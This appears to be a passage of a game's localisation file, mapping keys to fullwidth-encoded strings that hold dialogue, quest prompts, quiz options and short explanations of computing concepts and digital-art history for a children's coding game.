["codexDiscovery"] = "\239\188\163\239\188\175\239\188\164\239\188\165\239\188\184 \239\188\164\239\188\169\239\188\179\239\188\163\239\188\175\239\188\182\239\188\165\239\188\178\239\188\185:",
["etherstationArea"] = "\239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\179\239\189\148 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142",
["portetherLargeDoor"] = "404 - \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\188\174\239\189\143\239\189\148 \239\188\166\239\189\143\239\189\149\239\189\142\239\189\132",
["momaUpstairsPlaque5"] = "\239\188\161\239\188\161\239\188\178\239\188\175\239\188\174 \239\188\161\239\189\146\239\189\148\239\189\137\239\189\134\239\189\137\239\189\131\239\189\137\239\189\129\239\189\140 \239\188\169\239\189\142\239\189\148\239\189\133\239\189\140\239\189\140\239\189\137\239\189\135\239\189\133\239\189\142\239\189\131\239\189\133 (1990),\010\239\188\168\239\189\129\239\189\146\239\189\143\239\189\140\239\189\132 \239\188\163\239\189\143\239\189\136\239\189\133\239\189\142",
["cEnergy"] = "\239\188\180\239\189\136\239\189\133 \239\189\129\239\189\130\239\189\137\239\189\140\239\189\137\239\189\148\239\189\153 \239\189\148\239\189\143 \239\189\132\239\189\143 \239\189\151\239\189\143\239\189\146\239\189\139. \239\188\169\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\133\239\189\147 \239\189\137\239\189\142 \239\189\141\239\189\129\239\189\142\239\189\153 \239\189\132\239\189\137\239\189\134\239\189\134\239\189\133\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\134\239\189\143\239\189\146\239\189\141\239\189\147. \239\189\133\239\189\135: \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140, \239\189\136\239\189\133\239\189\129\239\189\148, \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148.",
["cOutput"] = "\239\188\169\239\189\142\239\189\134\239\189\143\239\189\146\239\189\141\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\144\239\189\146\239\189\143\239\189\131\239\189\133\239\189\147\239\189\147\239\189\133\239\189\132 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\133\239\189\142\239\189\148 \239\189\143\239\189\149\239\189\148 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146. \239\188\165\239\189\135: \239\189\150\239\189\137\239\189\133\239\189\151\239\189\137\239\189\142\239\189\135 \239\189\147\239\189\143\239\189\141\239\189\133\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\142 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142.",
["cIfStatementTitle"] = "\239\188\169\239\189\134 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\133\239\189\141\239\189\133\239\189\142\239\189\148",
["portetherWiseGuy"] = "\239\188\180\239\189\136\239\189\129\239\189\148 \239\189\135\239\189\137\239\189\146\239\189\140 \239\189\137\239\189\147 \239\189\146\239\189\149\239\189\142\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142 \239\189\129\239\189\142 \239\189\137\239\189\142\239\189\134\239\189\137\239\189\142\239\189\137\239\189\148\239\189\133 \239\189\140\239\189\143\239\189\143\239\189\144 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\143\239\189\149\239\189\142\239\189\148\239\189\129\239\189\137\239\189\142.",
["hdmicuriousDiag"] = "\239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133\239\189\147? \239\188\180\239\189\136\239\189\133\239\189\153 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\148\239\189\136\239\189\133 2,073,600 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146'\239\189\147 \239\189\130\239\189\146\239\189\129\239\189\137\239\189\142 \239\189\129\239\189\142\239\189\132 \239\189\130\239\189\146\239\189\137\239\189\142\239\189\135\239\189\147 \239\189\148\239\189\136\239\189\133\239\189\141 \239\189\148\239\189\143 \239\189\140\239\189\137\239\189\134\239\189\133 \239\189\143\239\189\142 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142.",
["momaUpstairsPlaque3"] = "\239\188\181\239\189\148\239\189\129\239\189\136 \239\188\180\239\189\133\239\189\129\239\189\144\239\189\143\239\189\148, (1975),\010\239\188\173\239\189\129\239\189\146\239\189\148\239\189\137\239\189\142 \239\188\174\239\189\133\239\189\151\239\189\133\239\189\140\239\189\140",
["chilledGirl"] = "\239\188\163\239\189\136\239\189\137\239\189\140\239\189\140\239\189\133\239\189\132 \239\188\167\239\189\137\239\189\146\239\189\140",
["jungleTildeHelp1a"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\180\239\189\137\239\189\140\239\189\132\239\189\133 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133.",
["jungleTildeHelp1b"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\145\239\189\149\239\189\137\239\189\154 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133.",
["jungleTildeHelp1c"] = "\239\188\180\239\189\133\239\189\140\239\189\140 \239\188\180\239\189\137\239\189\140\239\189\132\239\189\133 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\133 \239\188\177\239\189\149\239\189\137\239\189\154.",
["momaArtCritic"] = "\239\188\168\239\189\141\239\189\141\239\189\141... \239\188\169 \239\189\151\239\189\143\239\189\142\239\189\132\239\189\133\239\189\146 \239\189\136\239\189\143\239\189\151 \239\189\134\239\189\149\239\189\142\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\131\239\189\129\239\189\142 \239\189\132\239\189\146\239\189\129\239\189\151 \239\189\129 \239\189\148\239\189\133\239\189\129\239\189\144\239\189\143\239\189\148?",
["playterminalquest"] = "\239\188\167\239\189\143 \239\189\148\239\189\143 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142",
["play"] = "\239\188\176\239\189\140\239\189\129\239\189\153",
["audioQuest4"] = "\239\188\161\239\189\151\239\189\133\239\189\147\239\189\143\239\189\141\239\189\133! \239\188\180\239\189\136\239\189\129\239\189\142\239\189\139\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\136\239\189\133\239\189\140\239\189\144. \239\188\171\239\189\133\239\189\133\239\189\144 \239\189\133\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132 \239\189\129\239\189\142\239\189\132 \239\188\169'\239\189\141 \239\189\147\239\189\149\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\131\239\189\129\239\189\148\239\189\131\239\189\136 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\136\239\189\133\239\189\133\239\189\139\239\189\153 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148.",
["terminalquest1"] = "\239\188\183\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\179\239\189\148 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140. \239\188\176\239\189\140\239\189\129\239\189\153 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\188\177\239\189\149\239\189\133\239\189\147\239\189\148?",
["terminalquest2"] = "\239\188\179\239\189\136\239\189\149\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\132\239\189\143\239\189\151\239\189\142...",
["audioQuestTitle"] = "\239\188\169\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\149\239\189\132\239\189\137\239\189\143",
["who"] = "\239\188\183\239\189\136\239\189\143 \239\189\129\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149?",
["jungleMakeSnake1"] = "\239\188\176\239\189\140\239\189\129\239\189\153 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133?",
["makeArtQuizEnd"] = "\239\188\163\239\189\143\239\189\142\239\189\135\239\189\146\239\189\129\239\189\148\239\189\149\239\189\140\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147! \239\188\185\239\189\143\239\189\149 \239\189\146\239\189\133\239\189\129\239\189\140\239\189\140\239\189\153 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\147\239\189\148\239\189\149\239\189\134\239\189\134. \239\188\185\239\189\143\239\189\149 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\148\239\189\146\239\189\153 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\143\239\189\142\239\189\140\239\189\137\239\189\142\239\189\133!",
["jungleQuizOption4a"] = "\239\188\178\239\189\129\239\189\142\239\189\132\239\189\143\239\189\141 \239\188\173\239\189\133\239\189\141\239\189\143\239\189\146\239\189\153",
["portetherArea"] = "\239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146",
["cLogicGate"] = "\239\188\161 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133 \239\189\137\239\189\147 \239\189\129\239\189\142 \239\189\133\239\189\140\239\189\133\239\189\141\239\189\133\239\189\142\239\189\148\239\189\129\239\189\146\239\189\153 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139 \239\189\143\239\189\134 \239\189\129 \239\189\132\239\189\137\239\189\135\239\189\137\239\189\148\239\189\129\239\189\140 \239\189\131\239\189\137\239\189\146\239\189\131\239\189\149\239\189\137\239\189\148. \239\188\173\239\189\143\239\189\147\239\189\148 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\148\239\189\151\239\189\143 \239\189\137\239\189\142\239\189\144\239\189\149\239\189\148\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\149\239\189\148\239\189\144\239\189\149\239\189\148. \239\188\161\239\189\148 \239\189\129\239\189\142\239\189\153 \239\189\135\239\189\137\239\189\150\239\189\133\239\189\142 \239\189\141\239\189\143\239\189\141\239\189\133\239\189\142\239\189\148, \239\189\133\239\189\150\239\189\133\239\189\146\239\189\153 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\137\239\189\147 \239\189\137\239\189\142 \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\151\239\189\143 \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\189\131\239\189\143\239\189\142\239\189\132\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\140\239\189\143\239\189\151 (0) \239\189\143\239\189\146 \239\189\136\239\189\137\239\189\135\239\189\136 (1), \239\189\146\239\189\133\239\189\144\239\189\146\239\189\133\239\189\147\239\189\133\239\189\142\239\189\148\239\189\133\239\189\132 \239\189\130\239\189\153 \239\189\132\239\189\137\239\189\134\239\189\134\239\189\133\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\150\239\189\143\239\189\140\239\189\148\239\189\129\239\189\135\239\189\133 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140\239\189\147.",
["jungleQuizOption4b"] = "\239\188\178\239\189\133\239\189\141\239\189\143\239\189\150\239\189\133",
["Gregory"] = "\239\188\167\239\189\146\239\189\133\239\189\135\239\189\143\239\189\146\239\189\153",
["why"] = "\239\188\183\239\189\136\239\189\153?",
["cMono"] = "\239\188\161\239\189\140\239\189\140 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\141\239\189\137\239\189\152\239\189\133\239\189\132 \239\189\148\239\189\143\239\189\135\239\189\133\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\146\239\189\143\239\189\149\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\129 \239\189\147\239\189\137\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146.",
["jungleQuizOption2b"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\129\239\189\131\239\189\148 \239\188\164\239\189\137\239\189\147\239\189\131",
["pixelHackerDiag1"] = "\239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\132\239\189\143 \239\189\141\239\189\143\239\189\146\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148! \239\188\169 \239\189\147\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 $1 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\162\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147.",
["pixelHackerHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133.",
["pixelHackerHelp2"] = "\239\188\162\239\189\133\239\189\129\239\189\148 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148 2 \239\188\162\239\189\129\239\189\147\239\189\137\239\189\131 \239\188\172\239\189\133\239\189\150\239\189\133\239\189\140\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["rivalKidQuest4"] = "\239\188\161\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\148\239\189\146\239\189\153 \239\189\148\239\189\143 \239\189\135\239\189\133\239\189\148 30 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148\239\189\147 \239\189\137\239\189\142 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129?",
["rivalKidQuest5"] = "\239\188\183\239\189\143\239\189\129\239\189\136 \239\189\148\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\129\239\189\141\239\189\129\239\189\154\239\189\137\239\189\142\239\189\135! \239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\132\239\189\133\239\189\134\239\189\137\239\189\142\239\189\137\239\189\148\239\189\133\239\189\140\239\189\153 \239\189\135\239\189\143\239\189\143\239\189\132 \239\189\129\239\189\148 \239\189\147\239\189\137\239\189\141\239\189\144\239\189\140\239\189\133 \239\189\149\239\189\144 \239\189\129\239\189\142\239\189\132 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131. \239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\179\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\141\239\189\143\239\189\146\239\189\133.",
["cSpeaker"] = "\239\188\161 \239\189\132\239\189\133\239\189\150\239\189\137\239\189\131\239\189\133 \239\189\131\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\143\239\189\149\239\189\148\239\189\144\239\189\149\239\189\148\239\189\147 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147.",
["rivalKidQuest1"] = "\239\188\168\239\189\133\239\189\153! \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\143\239\189\149\239\189\148 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129? \239\188\174\239\189\143 \239\189\143\239\189\142\239\189\133 \239\189\134\239\189\140\239\189\137\239\189\133\239\189\147 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\142 \239\189\141\239\189\133.",
["rivalKidQuest2"] = "\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\135\239\189\133\239\189\148 20 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148\239\189\147 \239\189\137\239\189\142 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129? \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\144\239\189\140\239\189\129\239\189\153 \239\189\130\239\189\153 \239\189\148\239\189\129\239\189\140\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\135\239\189\149\239\189\153 \239\189\130\239\189\153 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\133\239\189\142\239\189\131\239\189\133.",
["rivalKidQuest3"] = "\239\188\183\239\189\143\239\189\151! \239\188\183\239\189\133\239\189\140\239\189\140 \239\189\132\239\189\143\239\189\142\239\189\133. \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\135\239\189\133\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\129 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\143\239\189\134 30? \239\188\180\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\141\239\189\153 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133.",
["momaUpstairsFan2"] = "\239\188\180\239\189\136\239\189\137\239\189\147 \239\189\148\239\189\133\239\189\129\239\189\144\239\189\143\239\189\148 \239\189\137\239\189\147 \239\189\129 \239\189\134\239\189\129\239\189\141\239\189\143\239\189\149\239\189\147 \239\189\143\239\189\130\239\189\138\239\189\133\239\189\131\239\189\148 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\133\239\189\129\239\189\146\239\189\140\239\189\153 3\239\188\164 \239\189\135\239\189\146\239\189\129\239\189\144\239\189\136\239\189\137\239\189\131\239\189\147, \239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\137\239\189\141\239\189\133 \239\189\146\239\189\133\239\189\142\239\189\132\239\189\133\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\149\239\189\146\239\189\150\239\189\133\239\189\147 \239\189\143\239\189\134 \239\189\129 \239\189\148\239\189\133\239\189\129\239\189\144\239\189\143\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\129 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 \239\189\147\239\189\143 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\144\239\189\129\239\189\146\239\189\148\239\189\137\239\189\131\239\189\149\239\189\140\239\189\129\239\189\146 \239\189\148\239\189\133\239\189\129\239\189\144\239\189\143\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\143\239\189\134\239\189\148\239\189\133\239\189\142 \239\189\149\239\189\147\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\148\239\189\133\239\189\147\239\189\148 3\239\188\164 \239\189\146\239\189\133\239\189\142\239\189\132\239\189\133\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\132\239\189\133. \239\188\179\239\189\143\239\189\141\239\189\133 3\239\188\164 \239\189\147\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\189\137\239\189\142\239\189\131\239\189\140\239\189\149\239\189\132\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\133\239\189\129\239\189\144\239\189\143\239\189\148 \239\189\129\239\189\147 \239\189\129 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\143\239\189\130\239\189\138\239\189\133\239\189\131\239\189\148 \239\189\142\239\189\133\239\189\152\239\189\148 \239\189\148\239\189\143 \239\189\131\239\189\149\239\189\130\239\189\133\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\144\239\189\136\239\189\133\239\189\146\239\189\133\239\189\147, \239\189\131\239\189\129\239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\148 \239\189\148\239\189\143 \239\189\143\239\189\134\239\189\148\239\189\133\239\189\142 \239\189\129\239\189\144\239\189\144\239\189\133\239\189\129\239\189\146 \239\189\129\239\189\147 \239\189\129 \239\189\138\239\189\143\239\189\139\239\189\133 \239\189\137\239\189\142 3\239\188\164 \239\189\134\239\189\137\239\189\140\239\189\141\239\189\147.",
["momaUpstairsFan3"] = "\239\188\161\239\188\161\239\188\178\239\188\175\239\188\174 \239\189\151\239\189\129\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148 \239\188\161\239\189\146\239\189\148\239\189\137\239\189\134\239\189\137\239\189\131\239\189\137\239\189\129\239\189\140 \239\188\169\239\189\142\239\189\148\239\189\133\239\189\140\239\189\140\239\189\137\239\189\135\239\189\133\239\189\142\239\189\131\239\189\133 \239\189\129\239\189\146\239\189\148\239\189\137\239\189\147\239\189\148, \239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\152 \239\189\129\239\189\140\239\189\135\239\189\143\239\189\146\239\189\137\239\189\148\239\189\136\239\189\141\239\189\147 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\148 \239\189\149\239\189\144 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\147\239\189\137\239\189\141\239\189\144\239\189\140\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\143\239\189\142\239\189\133\239\189\147 \239\189\151\239\189\133 \239\189\149\239\189\147\239\189\133 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\137\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\129\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\143 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\131\239\189\143\239\189\142\239\189\150\239\189\137\239\189\142\239\189\131\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\146\239\189\148\239\189\151\239\189\143\239\189\146\239\189\139\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\130\239\189\133 \239\189\141\239\189\137\239\189\147\239\189\148\239\189\129\239\189\139\239\189\133\239\189\142 \239\189\134\239\189\143\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\139 \239\189\143\239\189\134 \239\189\129 \239\189\136\239\189\149\239\189\141\239\189\129\239\189\142 \239\189\129\239\189\146\239\189\148\239\189\137\239\189\147\239\189\148. \239\188\161\239\189\140\239\189\148\239\189\136\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\137\239\189\148\239\189\147 \239\189\147\239\189\148\239\189\153\239\189\140\239\189\133\239\189\147 \239\189\136\239\189\129\239\189\132 \239\189\148\239\189\143 \239\189\130\239\189\133 \239\189\136\239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\132\239\189\133\239\189\132 \239\189\130\239\189\153 \239\188\163\239\189\143\239\189\136\239\189\133\239\189\142, \239\189\137\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\129\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\143 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\142 \239\189\137\239\189\142\239\189\134\239\189\137\239\189\142\239\189\137\239\189\148\239\189\133 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146 \239\189\143\239\189\134 \239\189\129\239\189\146\239\189\148\239\189\151\239\189\143\239\189\146\239\189\139\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133\239\189\147\239\189\133 \239\189\147\239\189\148\239\189\153\239\189\140\239\189\133\239\189\147.",
["momaUpstairsFan1"] = "\239\188\180\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\142\239\189\132\239\189\140\239\189\133\239\189\130\239\189\146\239\189\143\239\189\148 \239\188\179\239\189\133\239\189\148 \239\189\137\239\189\147 \239\189\129 \239\189\134\239\189\146\239\189\129\239\189\131\239\189\148\239\189\129\239\189\140, \239\189\151\239\189\136\239\189\137\239\189\131\239\189\136 \239\189\137\239\189\147 \239\189\129\239\189\142 \239\189\133\239\189\152\239\189\129\239\189\141\239\189\144\239\189\140\239\189\133 \239\189\143\239\189\134 \239\189\147\239\189\143\239\189\141\239\189\133\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\189\146\239\189\133\239\189\131\239\189\149\239\189\146\239\189\147\239\189\137\239\189\143\239\189\142. \239\188\179\239\189\136\239\189\129\239\189\144\239\189\133\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\132\239\189\146\239\189\129\239\189\151\239\189\142 \239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\146\239\189\149\239\189\140\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\146\239\189\129\239\189\151 \239\189\148\239\189\136\239\189\133\239\189\141\239\189\147\239\189\133\239\189\140\239\189\150\239\189\133\239\189\147 \239\189\149\239\189\144\239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133\239\189\141\239\189\147\239\189\133\239\189\140\239\189\150\239\189\133\239\189\147, \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\130\239\189\133\239\189\129\239\189\149\239\189\148\239\189\137\239\189\134\239\189\149\239\189\140 \239\189\137\239\189\141\239\189\129\239\189\135\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 